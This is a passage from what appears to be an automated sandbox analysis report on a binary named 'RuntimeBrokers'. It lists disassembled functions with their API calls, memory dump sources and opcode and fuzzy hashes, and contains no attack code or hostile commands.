                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterH_prolog3_LeaveReleaseSemaphore
                                        • String ID:
                                        • API String ID: 1606114100-0
                                        • Opcode ID: 026620905c99ead61635751dad269f8bb9cebe90b0ee1263d3d082d110c38ecd
                                        • Instruction ID: 9d090166cf8ed2d8440e5cf4cb0959aa38d9ebe1b3f01ac3b713de2d5387caf1
                                        • Opcode Fuzzy Hash: 026620905c99ead61635751dad269f8bb9cebe90b0ee1263d3d082d110c38ecd
                                        • Instruction Fuzzy Hash: A9A15A71804259DECB15CFA4C984BEEBBF4BF05308F6441ADD146A7A42EB317A4ADB60
                                        Function 6C176CA6 Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_
                                        • String ID:
                                        • API String ID: 2427045233-0
                                        • Opcode ID: f53fdc89b95f27c75e629d6a25a6a99b3a43161c5fb6a63bb9fea938cc01262b
                                        • Instruction ID: 343280eb1fd92c01497b1116d63b8ad6c09a34d0c58646ce89344bf244a10e45
                                        • Opcode Fuzzy Hash: f53fdc89b95f27c75e629d6a25a6a99b3a43161c5fb6a63bb9fea938cc01262b
                                        • Instruction Fuzzy Hash: 42614871C0825DCEDF28CFA8C4847DDBBB4AF19318F24425DD455A7682DB35AA4ACF60
                                        Function 6C176F4F Relevance: 6.2, APIs: 4, Instructions: 159COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C176F59
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,000000A4,6C177904,?,?,?,?,?,?,?,?,?,?,?), ref: 6C176FDF
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,?,000000A4,6C177904,?,?,?,?,?,?,?,?,?,?), ref: 6C177019
                                        • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,00000008,?,?,000000A4,6C177904,?,?,?,?,?,?,?,?,?), ref: 6C17704D
                                          • Part of subcall function 6C1C2E95: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,6C0B621D,0000002C,0000000C,6C0B5702,00000004,6C0B57B1,00000214), ref: 6C1C2EAA
                                          • Part of subcall function 6C160BBC: __EH_prolog3.LIBCMT ref: 6C160BC3
                                          • Part of subcall function 6C160BBC: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,00000001,00000004,6C1770F9,?), ref: 6C160BF5
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: ?u16to8@common@ierd_tgp@@D@2@@4@@D@std@@U?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_W@2@@std@@W@std@@$H_prolog3H_prolog3_mallocstrlen
                                        • String ID:
                                        • API String ID: 148002567-0
                                        • Opcode ID: 0e42868fad30d12f1c721dd583a844792d86f3a8cfd68edd1e59c4091a0a2d14
                                        • Instruction ID: c1f40de5bde5dbe6f34c6726b73e24d583ec9d333460d88e73220a3324a64eac
                                        • Opcode Fuzzy Hash: 0e42868fad30d12f1c721dd583a844792d86f3a8cfd68edd1e59c4091a0a2d14
                                        • Instruction Fuzzy Hash: 83616771D05358DEDB25CFA8C8847CDFBB4AF16318F20819AD049A7691DB705A89CFA2
                                        Function 6C17E68B Relevance: 6.1, APIs: 4, Instructions: 111COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C17E692
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        • ?extract_name@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV34@@Z.COMMON(?,?,00000001,?,0000004C,6C17E667,?,?), ref: 6C17E71D
                                        • ?CloseZipU@@YAKPAUHZIP__@@@Z.COMMON(00000000), ref: 6C17E799
                                        • ?CloseZipU@@YAKPAUHZIP__@@@Z.COMMON(00000000,00000001,?,0000004C,6C17E667,?,?), ref: 6C17E7B8
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: CloseP__@@@$?extract_name@common@ierd_tgp@@H_prolog3_U?$char_traits@_V34@@V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@memmove
                                        • String ID:
                                        • API String ID: 2542853892-0
                                        • Opcode ID: 38d3c7178b2de5da30fd0f9832ee7db4929183fd4680c618e765ee23cc30ccbb
                                        • Instruction ID: da30202aea86a8a2513fef07fdbd3a268b7381f86837be8b559ceafc44ce3659
                                        • Opcode Fuzzy Hash: 38d3c7178b2de5da30fd0f9832ee7db4929183fd4680c618e765ee23cc30ccbb
                                        • Instruction Fuzzy Hash: A7415D71805248DFDF14DFA8C890ADDBBF4AF25318F64415DD414BBA80DB39AB49CBA1
                                        Function 6C0DF8E3 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0DF8EA
                                        • _Copy_construct_from.LIBCPMT ref: 6C0DF906
                                        • _Copy_construct_from.LIBCPMT ref: 6C0DF91C
                                          • Part of subcall function 6C0DCF9F: __EH_prolog3_catch.LIBCMT ref: 6C0DCFA6
                                        • _Copy_construct_from.LIBCPMT ref: 6C0DF97A
                                          • Part of subcall function 6C0DD524: __EH_prolog3.LIBCMT ref: 6C0DD52B
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Copy_construct_from$H_prolog3$H_prolog3_catch
                                        • String ID:
                                        • API String ID: 1972245701-0
                                        • Opcode ID: 20823b214c741efb72b10033bdb9be6218ef9048b9cd6d0141511aa896ae973a
                                        • Instruction ID: 8831725ca28ebbe317f2e6d88d678bac6825ca1da418db76276ef866f4aa020b
                                        • Opcode Fuzzy Hash: 20823b214c741efb72b10033bdb9be6218ef9048b9cd6d0141511aa896ae973a
                                        • Instruction Fuzzy Hash: 15415A31D01249EBCF05DFA8C890BDDBBF9AF15308F25808DE455BB641C776AA08CBA1
                                        Function 6C0DFA23 Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C0DFA2A
                                        • _Copy_construct_from.LIBCPMT ref: 6C0DFA46
                                        • _Copy_construct_from.LIBCPMT ref: 6C0DFA5C
                                          • Part of subcall function 6C0DCF9F: __EH_prolog3_catch.LIBCMT ref: 6C0DCFA6
                                        • _Copy_construct_from.LIBCPMT ref: 6C0DFABA
                                          • Part of subcall function 6C0DD565: __EH_prolog3.LIBCMT ref: 6C0DD56C
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Copy_construct_from$H_prolog3$H_prolog3_catch
                                        • String ID:
                                        • API String ID: 1972245701-0
                                        • Opcode ID: 28cf7180b0debb4d9b93b221c88d2f8c0b6ae9438adccba6524d1b3426cc4e46
                                        • Instruction ID: 91d4c55b8164760bdab5a38e708c47e3fa1629be2f47ea0e80c26e2f3a5ae28d
                                        • Opcode Fuzzy Hash: 28cf7180b0debb4d9b93b221c88d2f8c0b6ae9438adccba6524d1b3426cc4e46
                                        • Instruction Fuzzy Hash: 3B415A31D01249DBCF05DFA8C890BDDBBF9AF09318F158089E455BB681C776AA08CBA1
                                        Function 6C0A2870 Relevance: 6.1, APIs: 4, Instructions: 97COMMON
                                        Download Yara Rule
                                        APIs
                                        • rand.API-MS-WIN-CRT-UTILITY-L1-1-0 ref: 6C0A288A
                                        • inet_addr.WS2_32(00000690), ref: 6C0A28DB
                                        • inet_addr.WS2_32(?), ref: 6C0A28E4
                                        • inet_addr.WS2_32(00000000), ref: 6C0A28E9
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: inet_addr$rand
                                        • String ID:
                                        • API String ID: 2589549786-0
                                        • Opcode ID: 4c457c18cf8039d818e9309e5e2d09cad673944be28f11216dc94d392b625e40
                                        • Instruction ID: 7cd37b2ec647c09d206c3c484df5277d1e26660a079d1fe6f76645ce2f19da23
                                        • Opcode Fuzzy Hash: 4c457c18cf8039d818e9309e5e2d09cad673944be28f11216dc94d392b625e40
                                        • Instruction Fuzzy Hash: 903106326093564BC714CFA6D48479AB7E6FF89618F09067DE89893701D732E90ACB92
                                        Function 0042E644 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • std::_Lockit::_Lockit.LIBCPMT ref: 0042E672
                                          • Part of subcall function 00433E9D: std::_Lockit::_Lockit.LIBCPMT ref: 00433ED1
                                          • Part of subcall function 00433E9D: std::_Lockit::~_Lockit.LIBCPMT ref: 00433EFF
                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 0042E6DD
                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 0042E747
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2954513519.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000001.00000002.2954495294.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954625279.000000000052E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954661807.0000000000577000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954678573.0000000000578000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000001.00000002.2954698601.000000000058A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_400000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: Lockitstd::_$Lockit::_Lockit::~_$Exception@8Throw
                                        • String ID:
                                        • API String ID: 2777619170-0
                                        • Opcode ID: 586820882d845fa604fe9bb962c0de97d8e3d177da3f868b8e20488d59d132d8
                                        • Instruction ID: cf92cf14c896b5b6ac0ff95f33517515450158980357edaca27f3c29e5afdb62
                                        • Opcode Fuzzy Hash: 586820882d845fa604fe9bb962c0de97d8e3d177da3f868b8e20488d59d132d8
                                        • Instruction Fuzzy Hash: 6841C374D00219DFCF04DFA9D985BEEBBB0FB18315F20456AE411B7290D7386A44CB64
                                        Function 6C17E5A1 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C17E5A8
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 6C17E5DD
                                        • ?ZipFilesToFile@common@ierd_tgp@@YA_NABV?$vector@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@V?$allocator@V?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@2@@std@@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,00000040), ref: 6C17E662
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@_V?$allocator@_V?$basic_string@_W@std@@$V?$allocator@W@2@@4@@$?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@File@common@ierd_tgp@@FilesH_prolog3_U?$char_traits@V?$basic_string@V?$vector@W@2@@std@@W@2@@std@@@2@@std@@
                                        • String ID:
                                        • API String ID: 161599359-0
                                        • Opcode ID: 32c028e3692db3112e58dce2eeae9af36a1592b82ccb242fcc6c34b6d5fee5a1
                                        • Instruction ID: b6cff3b530b13140f5b11549f13275c01efb8aff7bf8fdf28d1e495df944aa7a
                                        • Opcode Fuzzy Hash: 32c028e3692db3112e58dce2eeae9af36a1592b82ccb242fcc6c34b6d5fee5a1
                                        • Instruction Fuzzy Hash: 6D3129B1C05208DFDB14CFA8C4806DDFBB4BF19318F64416ED118B7680DB34AA4ACBA5
                                        Function 6C172617 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_catch.LIBCMT ref: 6C17261E
                                          • Part of subcall function 6C0B03D0: ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(?,B33B76E5,?,?,00000000,6C315A18,000000FF,?,6C0C46FF,?,00000000,0000004C,6C0C7CDC,?,?), ref: 6C0B041C
                                        • ?getloc@ios_base@std@@QBE?AVlocale@2@XZ.MSVCP140(?,?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C17264E
                                          • Part of subcall function 6C172C86: __EH_prolog3.LIBCMT ref: 6C172C8D
                                          • Part of subcall function 6C172C86: ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,00000018,6C17265E,00000000,?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172C98
                                          • Part of subcall function 6C172C86: ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172CAF
                                          • Part of subcall function 6C172C86: std::locale::_Getfacet.LIBCPMT ref: 6C172CB9
                                          • Part of subcall function 6C172C86: ?_Getcat@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000,?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172CD2
                                          • Part of subcall function 6C172C86: std::_Facet_Register.LIBCPMT ref: 6C172CEA
                                          • Part of subcall function 6C172C86: ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000,?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C172D0D
                                        • ?get@?$time_get@DV?$istreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@QBE?AV?$istreambuf_iterator@DU?$char_traits@D@std@@@2@V32@0AAVios_base@2@AAHPAUtm@@PBD4@Z.MSVCP140(?,?,?,00000000,00000001,00000002,00000000,?,00000002,?,?), ref: 6C1726B0
                                        • ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(00000000,00000000,?,?,?,00000000,0000002C,6C174505,?,?,?,00000001,00000001,000000E0), ref: 6C1726E9
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: U?$char_traits@$V?$istreambuf_iterator@$D@std@@@std@@D@std@@@std@@@std@@Lockit@std@@$??0_??1_?get@?$time_get@?getloc@ios_base@std@@?setstate@?$basic_ios@Bid@locale@std@@D@std@@@2@Facet_Getcat@?$time_get@GetfacetH_prolog3H_prolog3_catchIpfx@?$basic_istream@RegisterUtm@@V32@0V42@@Vfacet@locale@2@Vios_base@2@Vlocale@2@std::_std::locale::_
                                        • String ID:
                                        • API String ID: 3804686604-0
                                        • Opcode ID: bebb550bb91a16b9f9d705483bd95ee1aa50295279529d3c530ebc8ce7bb9208
                                        • Instruction ID: 1b9358ae4b327634e7dc951c00fe8d406adb520148960e355d62ca5524b86f38
                                        • Opcode Fuzzy Hash: bebb550bb91a16b9f9d705483bd95ee1aa50295279529d3c530ebc8ce7bb9208
                                        • Instruction Fuzzy Hash: 4C318935A01149EFDF14CB94C988FEDBBB5BF48314F248088E516AB3A1C774AE85CB61
                                        Function 6C15A42E Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 6C15A435
                                        • ?u8to16@common@ierd_tgp@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@AAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@4@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 6C15A45D
                                          • Part of subcall function 6C14B7B8: __EH_prolog3_GS.LIBCMT ref: 6C14B7BF
                                          • Part of subcall function 6C0B6B70: ?_Execute_once@std@@YAHAAUonce_flag@1@P6GHPAX1PAPAX@Z1@Z.MSVCP140(6C438534,6C0B6BB1,6C438538,?,6C0BA235,00000000,?,00000010), ref: 6C0B6B81
                                          • Part of subcall function 6C0B6B70: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C0B6B8D
                                          • Part of subcall function 6C0BCEF6: memmove.VCRUNTIME140(00000000,?,?,00000001,?,?,?,?,?,?,6C0BA734,?,00000004,6C0BA09E,?,B33B76E5), ref: 6C0BCF55
                                        • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 6C15A48D
                                        • ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000003C), ref: 6C15A4C6
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955615503.000000006C440000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_6c0a0000_RuntimeBrokers.jbxd
                                        Similarity
                                        • API ID: H_prolog3_$?create_directory_ex@?exists@filesystem@ierd_tgp@@?u8to16@common@ierd_tgp@@D@2@@std@@D@std@@Execute_once@std@@Sys_wrapper@common@ierd_tgp@@U?$char_traits@U?$char_traits@_Uonce_flag@1@V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_Verror_code@std@@@Vpath@12@Vpath@filesystem@3@@W@2@@4@@W@std@@memmoveterminate
                                        • String ID:
                                        • API String ID: 4191027491-0
                                        • Opcode ID: 54a8dc30efbe0f1ef50a641aff920c3daf77229ea3351b0438f626948169b863
                                        • Instruction ID: 0a9ecba99e6bcb06baaabd5b4551933347b5457bb6041540da63969375482c49
                                        • Opcode Fuzzy Hash: 54a8dc30efbe0f1ef50a641aff920c3daf77229ea3351b0438f626948169b863
                                        • Instruction Fuzzy Hash: 612137B1C05248DEDF04DFE4D484BDDBBB8AF29318F54512ED111B7680DB34AA49CB65
                                        Function 6C13A4A5 Relevance: 6.1, APIs: 4, Instructions: 64COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C13A4AC
                                        • std::_Cnd_initX.LIBCPMT ref: 6C13A4C7
                                          • Part of subcall function 6C0D17D4: _Mtx_lock.MSVCP140(?,?,?,6C0D1B80,?,00000014), ref: 6C0D17DB
                                          • Part of subcall function 6C0D17D4: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6C0D1B80,?,00000014), ref: 6C0D17E8
                                        • std::_Cnd_initX.LIBCPMT ref: 6C13A4DB
                                          • Part of subcall function 6C0D17F3: _Mtx_unlock.MSVCP140(?,?,?,6C0D1BC0,?,?,?), ref: 6C0D17FA
                                          • Part of subcall function 6C0D17F3: ?_Throw_C_error@std@@YAXH@Z.MSVCP140(00000000,?,?,6C0D1BC0,?,?,?), ref: 6C0D1807
                                        • std::_Cnd_initX.LIBCPMT ref: 6C13A554
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.2955254170.000000006C0A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C0A0000, based on PE: true
                                        • Associated: 00000001.00000002.2955238423.000000006C0A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955459409.000000006C33D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955543287.000000006C421000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955560191.000000006C422000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955576918.000000006C424000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000001.00000002.2955598468.000000006C438000.00000004.00000001.01000000.00000007.sdmpDownload File
